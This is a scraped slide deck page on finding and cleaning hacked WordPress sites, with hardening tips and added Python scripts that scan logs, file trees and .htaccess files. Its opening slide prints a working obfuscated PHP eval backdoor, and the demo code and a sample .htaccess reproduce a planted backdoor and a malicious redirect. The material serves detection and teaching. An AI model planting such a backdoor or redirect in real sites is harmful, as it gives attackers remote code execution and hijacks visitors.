Presented at WordCamp Malaysia 2010.
Slideshare also does not resize my cropped images properly, thus resulting in squished images. This is noticeable on my squished code.
Common sense, simple security for WordPress. Many presentations have lots of complicated .htaccess tricks, moving/hiding files, etc. However, if people are overwhelmed with details, they tend to not do anything. If I were to summarize what you MUST do for security, I'd say:
1 - BACKUP - find a backup tool and use it. Subscribe to VaultPress.com or host your site with WPEngine.com or purchase BackupBuddy plugin and schedule regular backups. If you're short on cash, use BackWPUp plugin and download your wp-content folder.
2 - UPDATE - All plugins, themes, and WordPress at least once a month or whenever there is a security update. Sign up for an account at WordPress.org, so you'll get notices of WordPress security updates.
3 - DELETE -- All unused plugins and themes. These are your biggest security risks. Delete all unused copies of WordPress you might have installed on your server.
4 - BE CAUTIOUS - Don't use plugins willy nilly. Do some research. They are not all made the same, and they will leave you vulnerable to hacking.
5 - PASSWORDS -- Use strong, randomly generated passwords, all different, for everything - your hosting, ftp, WP login, and email. Use 1Password.com to track your passwords easily and securely.
6 - SECURITY PLUGINS -- Run Firewall 2 and Limit Login Attempts. There are others, but I don't know how well they play with others and what things they modify. You can check out Bulletproof Security and Better WP Security.
7 - BEST PRACTICES - See the slideshow for some other best practices regarding users, comments, etc.
If you just do the above 6 things systematically, you'll be far ahead of your peers! Good luck!
A presentation on the security vulnerabilities of WordPress environments, along with information on how to recover from a hack and tips for securing your site.
Brad Williams, the co-author of Professional WordPress Plugin Development, gives his presentation on Intro to WordPress Plugin Development to the NYC WordPress Meetup group in March 2011.
Sucuri Webinar: How to identify and clean a hacked Joomla! website - Sucuri
Website compromises can happen to any CMS and fixing them can be a daunting task.
Sucuri Remediation Team Lead, Ben Martin, provided in this webinar a step-by-step guide to fixing your hacked Joomla! site.
This webinar is helpful if your website becomes compromised, minimizing the attack time and stress.
Video here: https://youtu.be/3BEUQ0X9IBo
WordPress is the most popular blogging platform nowadays. Many high profile companies are using WordPress as their blogging platform. Have you ever thought about the security of your blog running WordPress? This presentation was presented on 13th Feb 2010, at Nagpur PHP Meetup by me.
Presentation on WordPress security, which looks at why WordPress sites get hacked, how they get hacked, what to do to reduce your risk and how to recover your site after it has been hacked, or infected with malware.
5 Things You Shouldn't Do With A WordPress Plugin - Kelly Phillips
This presentation is meant to help you implement some common WordPress functionality in a manual way instead of using plugins. This keeps your valuable plugin juice free for the plugins that are more complicated.
Technical SEO: Crawl Space Management - SEOZone Istanbul 2014 - Bastian Grimm
My talk at #SEOZone 2014 in Istanbul covering various aspects of crawl space optimization such as crawler control & indexation strategies as well as site speed.
Learn how to keep your WordPress-powered website secure from hackers and exploits. Brad Williams from WebDevStudios.com shows examples of hacked sites, shares tips and plugins for keeping WordPress secure, and talks about his experiences with WordPress and security.
WordPress itself is pretty secure. To secure your WordPress site, you need to look at the bigger security picture.
In this presentation, I give a rundown of many of the other pieces of the application stack that WordPress relies on, the various vectors that attackers can use, and what kinds of things you can do to help protect your site.
Download the original Keynote file for my presenter's notes with more details.
Securing Your WordPress Website - WordCamp GC 2011 - Vlad Lasky
Presentation slides from Vladimir Lasky's talk on how to harden your WordPress website against would-be attackers and avoid inadvertently creating security holes.
Contains various tips and recommendations for off-the-shelf plugins to mitigate common security threats.
Presented on Sunday 6th November at WordCamp Gold Coast 2011.
Securing Your WordPress Website by Vlad Lasky - wordcampgc
Vlad is a computer systems engineer with a humorous and educational story to tell about WordPress security. This presentation gives every WordPress site administrator tips on how to harden their site against would-be attackers and avoid inadvertently doing things that could compromise site security.
Hardening WordPress - SAScon Manchester 2013 (WordPress Security) - Bastian Grimm
My talk at #SAScon Manchester 2013 about WordPress security and how to make your WordPress (a bit) safer. Including two factor authentication, a lot of security specific settings and much more :)
Protect Your WordPress From The Inside Out - SiteGround.com
The recent spike of hack attempts on various WordPress sites has made it more urgent than ever to take action and secure your WordPress in the best possible way. In this webinar the WebDevStudios founders show the best practices and share insightful tricks on how to protect your WordPress from getting hacked:
- WordPress Security Threats & Trends
- WordPress Admin Security Settings
- Securing Files, Folders & Databases
- Bullet Proof Passwords
- Vulnerable WordPress Extensions
- Recommended Plugins & Services
Complete Wordpress Security By CHETAN SONI - Cyber Security Expert - Chetan Soni
You have been busy building your website, writing great content, touching people’s lives, trying to make money online with your blog and you woke up to find out that your WordPress website has been hacked! And of course, your only option is to search Google for a solution.
Presentation given at the WP Jyväskylä Meetup March 21st, 2017. This revised version contains references to the WordPress security news that circulated in February 2017.
Similar to Your WordPress Site is and is not Hacked - You don't know until you check (20)
2. SCHRODINGER’S WEBSITE
You must assume your site is both hacked and not hacked until you open the box and find out.
<?php
$qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].
$qV[0].$qV[1]);if(isset(${$s20}['q53b3a6'])){eval($
{$s20}['q53b3a6']);}?>
3. WordPress Instructor and Custom Theme Developer
Using WordPress Since 2007 —Version 2.2
Not a security expert, but I play one on WordPress.tv
Angela Bowman
Ask WP Girl @askwpgirl
5. WHY DO HACKERS HACK?
Deface sites for fun
Add spammy links to bad web neighborhoods (SEO spam)
Hijack site to add spam, porn, gambling, pay-day loans content
Steal sensitive information to sell
Distribute malware to personal computers
Use server resources for distributed attacks
6. WHAT DO HACKERS ACTUALLY DO?
Create admin account
Reset passwords
Inject malicious code into content
Add malicious code to existing files or new files
Redirect your website
http://www.wpmayor.com/wordpress-security-based-facts-statistics/
Gravity Forms hack
7. WHY SHOULD YOU CARE?
Performance issues
SEO tanks
Blacklisting or Phish Tank
Account closed
Angry customers
8. TYPICALLY, ONLY THE MOST SEVERELY HACKED SITES WILL BE BLACKLISTED OR SUSPENDED BY HOST
Many hacks are hidden
10. RECENT VULNERABILITIES
Google Analytics
WordPress 4.2.1
Backup to Dropbox
FancyBox
TwentyFifteen
Revolution Slider
Gravity Forms
JetPack
Database of all vulnerable plugins and themes: https://wpvulndb.com/
11. LOW HANGING FRUIT
Vulnerabilities immediately published on the web
Hackers write bots to exploit vulnerabilities
Website owners are oblivious: they don’t update, use weak passwords, install tons of plugins, use not-great web hosting
13. “SPOT THE HACK” GAME
A - Scan Site
B - Look at files on server
C - Find the hacked code
14. 1 - Backdoors
PHP files uploaded to your server and accessed remotely. Severely affect site and server performance. Not easy to find.
15. IT'S VERY COMMON, THAT BACKDOORS DON'T HAVE ANY VISIBLE SIGNS IN THE SITE CODE AND IT'S IMPOSSIBLE TO DETECT THEM BY ACCESSING THE INFECTED SITE FROM OUTSIDE. ~ SUCURI
16. 2 - Drive by Downloads
Script injected on website generates links to malware sites or downloads malware from your site to visitors’ computers.
Easy for scanners to detect.
17. 3 - Pharma Hack
Spam links injected onto web pages only visible to search engines. Difficult to scan for because cloaked.
https://blog.sucuri.net/2011/02/cleaning-up-an-infected-web-site-part-i-wordpress-and-the-pharma-hack.html
18. 4 - Malicious Redirects
Redirects traffic from your website to another typically by modifying the .htaccess file, sometimes only when viewed by a particular device or browser, like a phone
Hacked .htaccess file
19. DIY HACK RECOVERY
Via SFTP (preferred) or FTP
1 Backup: Download everything. Good to examine later for details of hack if needed.
2 Delete all except: cgi-bin, .htaccess, wp-config.php (examine these)
3 Upload fresh: WordPress, Themes, Plugins, cleaned uploads
20. Why are people from Thailand and Romania accessing a strangely named PHP file somewhere?
Check raw access logs via cPanel
db12.php, css.php, dirs35.php????
MONITORING TIPS
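The raw-log check from this slide as a script. This is an added example, not part of the original deck: it reads Apache combined-format lines and lists PHP files that answered 200 but are not normal WordPress entry points. The `EXPECTED` allowlist, the function name and the sample log lines (file names from the slide, paths and addresses constructed) are assumptions.

```python
import re
from collections import defaultdict

# Apache "combined" format, the layout of cPanel's raw access logs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

# Assumption: PHP files a stock WordPress site is normally requested at.
# Extend this for your own site before trusting the output.
EXPECTED = re.compile(
    r"^/(index|wp-login|wp-cron|xmlrpc|wp-comments-post)\.php$"
    r"|^/wp-admin/([\w-]+/)*[\w-]+\.php$"
)

def odd_php_requests(lines):
    """Group successful requests to unexpected PHP files by path."""
    hits = defaultdict(lambda: {"ips": set(), "posts": 0, "total": 0})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        path = m["path"].split("?", 1)[0]
        # A 200 means the file exists and ran; a 404 is only a probe.
        if m["status"] != "200" or not path.lower().endswith(".php"):
            continue
        if EXPECTED.match(path):
            continue
        entry = hits[path]
        entry["ips"].add(m["ip"])
        entry["total"] += 1
        entry["posts"] += int(m["method"] == "POST")
    # POSTs first: a backdoor like the one on slide 2 reads its input from POST data.
    return sorted(
        hits.items(),
        key=lambda kv: (-kv[1]["posts"], -len(kv[1]["ips"]), kv[0]),
    )

# Constructed sample lines (documentation address ranges, made-up paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/May/2015:10:01:02 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [12/May/2015:10:01:09 +0000] "POST /wp-login.php HTTP/1.1" 200 2301 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/May/2015:10:02:11 +0000] "POST /wp-content/uploads/2015/04/db12.php HTTP/1.1" 200 12 "-" "-"',
    '203.0.113.44 - - [12/May/2015:10:02:40 +0000] "POST /wp-content/uploads/2015/04/db12.php HTTP/1.1" 200 12 "-" "-"',
    '203.0.113.44 - - [12/May/2015:10:03:05 +0000] "GET /wp-content/themes/demo/css/css.php?x=1 HTTP/1.1" 200 0 "-" "-"',
    '198.51.100.7 - - [12/May/2015:10:03:30 +0000] "GET /dirs35.php HTTP/1.1" 404 210 "-" "-"',
    '192.0.2.10 - - [12/May/2015:10:04:00 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 47 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for path, info in odd_php_requests(SAMPLE_LOG):
        print(path, info["posts"], "POSTs from", sorted(info["ips"]))
```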
21. Audit Activity on Site
https://wordpress.org/plugins/wp-simple-firewall/
22. Check WordPress core integrity using Sucuri plugin https://wordpress.org/plugins/sucuri-scanner/
Run https://wordpress.org/plugins/gotmls/ to check wp-content folder
Look for modified dates, unusual names, file types that don’t belong
Compare file list to original download
Commonly hacked files: .htaccess, wp-config.php, index.php, functions.php, header.php
Any file can be hacked!
Finding PHP Back Doors
Hmmmm? PHP in a CSS folder?
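The manual checks on this slide as one script. This is an added example, not part of the original deck and not how the plugins named above work: it compares a live tree with a fresh download, reports PHP files inside asset folders, and flags `eval()` fed by a variable-variable, the form used by the snippet on slide 2. The folder list, function names and demo tree are assumptions.

```python
import hashlib
import re
import tempfile
from pathlib import Path

PHP_SUFFIXES = {".php", ".phtml", ".php5"}
# Assumption: folders that should only hold static assets or media on this site.
ASSET_DIRS = {"uploads", "css", "js", "images", "img", "fonts"}

# eval() fed by a request superglobal, or by a variable-variable such as
# ${$x}['key'], the form slide 2's snippet uses to keep the literal text
# "$_POST" out of the file. \s* tolerates the line wrapping seen on the slide.
DYNAMIC_EVAL = re.compile(
    r"\beval\s*\(\s*(\$\s*\{|\$_(POST|GET|REQUEST|COOKIE)\b)", re.IGNORECASE
)

def sha256(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()

def audit(site_dir, clean_dir):
    """Compare a live tree with a fresh download of the same release."""
    site, clean = Path(site_dir), Path(clean_dir)
    report = {"added": [], "modified": [], "php_in_assets": [], "dynamic_eval": []}
    for f in sorted(p for p in site.rglob("*") if p.is_file()):
        rel = f.relative_to(site)
        name = rel.as_posix()
        ref = clean / rel
        if not ref.is_file():
            report["added"].append(name)       # not in the original download
        elif sha256(f) != sha256(ref):
            report["modified"].append(name)    # same name, different content
        if f.suffix.lower() in PHP_SUFFIXES:
            if ASSET_DIRS & {part.lower() for part in rel.parts[:-1]}:
                report["php_in_assets"].append(name)
            if DYNAMIC_EVAL.search(f.read_text(errors="replace")):
                report["dynamic_eval"].append(name)
    return report

def demo():
    """Audit a constructed clean/live pair built in a temporary directory."""
    files = {
        "index.php": "<?php // Silence is golden.\n",
        "themes/demo/functions.php": "<?php add_theme_support('title-tag');\n",
        "themes/demo/css/style.css": "body{margin:0}\n",
    }
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = Path(tmp, "clean"), Path(tmp, "live")
        for root in (clean, live):
            for rel, body in files.items():
                (root / rel).parent.mkdir(parents=True, exist_ok=True)
                (root / rel).write_text(body)
        # Constructed tampering: a dropped file carrying the tail of the
        # slide 2 snippet, and one extra line in an existing theme file.
        (live / "themes/demo/css/css.php").write_text(
            "<?php if(isset(${$s20}['q53b3a6'])){eval($\n{$s20}['q53b3a6']);}?>"
        )
        with open(live / "themes/demo/functions.php", "a") as fh:
            fh.write("// changed\n")
        return audit(live, clean)

if __name__ == "__main__":
    for check, names in demo().items():
        print(check, names)
```

On a real site everything under uploads shows up as "added", since media is not part of any download; that listing is the set to review by hand.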
23. Finding and Removing Malicious Redirects
Listen to when someone tells you that they tried to visit your site and couldn’t and find out which browser or device they were using at the time.
Use http://www.botsvsbrowsers.com/SimulateUserAgent.asp to verify
Scan with Sucuri’s SiteCheck
Check all the .htaccess files on the server and remove the redirect.
https://sitecheck.sucuri.net/
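One way to check every .htaccess file for the device-specific redirects described on slides 18 and 23. This is an added example, not part of the original deck: it reports `RewriteRule` and `Redirect` targets on hosts you do not own and marks those gated on the visitor's user agent or referrer. The function names, the `own_hosts` parameter and the sample file (constructed, example domains) are assumptions.

```python
import re
from pathlib import Path

# Request headers that injected rules test so only some visitors are redirected.
VISITOR_VARS = ("HTTP_USER_AGENT", "HTTP_REFERER")
REDIRECT_DIRECTIVES = {"redirect", "redirectmatch", "redirectpermanent", "redirecttemp"}
# Host part of an absolute URL; stops at mod_rewrite variables such as %{REQUEST_URI}.
HOST_RE = re.compile(r"^[a-z][a-z0-9+.-]*://([^/:?#%$\s]+)", re.IGNORECASE)

def audit_htaccess(text, own_hosts):
    """Return one finding per rule that sends visitors to a host not in own_hosts."""
    own = {h.lower() for h in own_hosts}
    findings, pending = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        directive = parts[0].lower()
        if directive == "rewritecond":
            pending.append(raw.strip())  # conditions apply to the next RewriteRule
            continue
        target = None
        if directive == "rewriterule" and len(parts) >= 3:
            target = parts[2]
        elif directive in REDIRECT_DIRECTIVES and len(parts) >= 3:
            target = parts[-1]
        m = HOST_RE.match(target) if target else None
        if m and m.group(1).lower() not in own:
            gated = [c for c in pending if any(v in c.upper() for v in VISITOR_VARS)]
            findings.append({
                "line": lineno,
                "host": m.group(1).lower(),
                "visitor_specific": bool(gated),
                "conditions": gated,
            })
        if directive == "rewriterule":
            pending = []  # a RewriteRule consumes the conditions before it
    return findings

def scan_tree(root, own_hosts):
    """Run the audit over every .htaccess file below root."""
    results = {}
    for f in Path(root).rglob(".htaccess"):
        hits = audit_htaccess(f.read_text(errors="replace"), own_hosts)
        if hits:
            results[str(f)] = hits
    return results

# Constructed sample: a phone-only redirect placed above normal site rules.
SAMPLE_HTACCESS = r"""RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (android|iphone|ipad) [NC]
RewriteRule ^(.*)$ http://unwanted.example.net/ [R=302,L]
RewriteCond %{HTTPS} off
RewriteRule ^ https://www.example.org%{REQUEST_URI} [R=301,L]
# BEGIN WordPress
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
"""

if __name__ == "__main__":
    for finding in audit_htaccess(SAMPLE_HTACCESS, {"www.example.org"}):
        print(finding)
```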
24. Use Google Search Console!
Google Webmaster Tools/Search Console
Search Queries – you can spot queries irrelevant to your site.
Links to Your Site – you can find suspicious incoming links here.
Internal Links – this report can help reveal rogue sections of your site.
http://askwpgirl.com/submitting-wordpress-site-google-webmaster-tools/
25. Check for rogue users and posts
Your new admin friends?
Find hidden admin users: http://snipe.net/2010/01/when-wordpress-gets-hacked/
26. IMMEDIATELY CHANGE PASSWORDS
Use Sucuri plugin to Generate New Security Keys
Reset all passwords, including WordPress users, FTP, web hosting, control panel
Scan computer for viruses!
27. See http://askwpgirl.com/nuke-it-from-orbit/ for step-by-step elimination
CLEAN UP “BAD” HACK
If hackers got admin access to site or database, you might have to nuke the entire site from orbit — it’s the only way to be sure
https://www.youtube.com/watch?v=aCbfMkh940Q
Or contact sucuri.net for site clean up and monitoring
28. REQUEST SITE REVIEW
If Google blacklisted your site or marked it for phishing scam, you will need to request a review after you are certain you’ve cleaned up all hacked files:
https://support.google.com/webmasters/answer/168328?hl=en
30. UPDATE UPDATE UPDATE
Timely updates are critical for security.
Tools: iControlWP, MainWP, InfiniteWP, Jetpack, ManageWP
http://askwpgirl.com/updating-wordpress-plugins-themes-core/
31. SECURE YOUR LOGIN
Online Generator:
http://www.pctools.com/guides/password/
Track Passwords:
http://agilebits.com/products/1Password
Enable Two-Factor Authentication:
http://askwpgirl.com/wordpress-two-factor-authentication-plugins/
Avoid logging in on public WiFi Networks
32. RUN A TIGHT SHIP!
Delete ALL unused stuff on server
Only use popular and well-maintained themes and plugins
Don’t allow users to register (Settings > General)
Always hold comments for moderation and use spam filtering (Akismet plugin)
33. GOOD HOSTING
Correct File Permissions
WordPress Auto Updates
Firewall and Scanning
Regular Backups
Server Security
Performance Optimization
Managed WordPress Hosts:
Site Ground
WP Engine
Get Flywheel
Web Synthesis
Pantheon
34. EFFECTIVE SECURITY PLUGIN FEATURES
Limit login access
Block bad URL requests with a Firewall
Audit activity
Security through obscurity is not security
IP addresses don’t matter and should not be used as the foundation of a WordPress security policy
My favorite security plugin: https://wordpress.org/plugins/wp-simple-firewall/
Does all the above and more. Will notify you of vulnerable plugins.
35. BACKUPS
Common wisdom is to backup your site
Backups are to your site what major medical health care coverage is to your health
Usually only helpful in case of a disaster
Services: VaultPress and WorpDrive good hosted solutions!
Plugins: BackupBuddy (paid), BackWPUp, Duplicator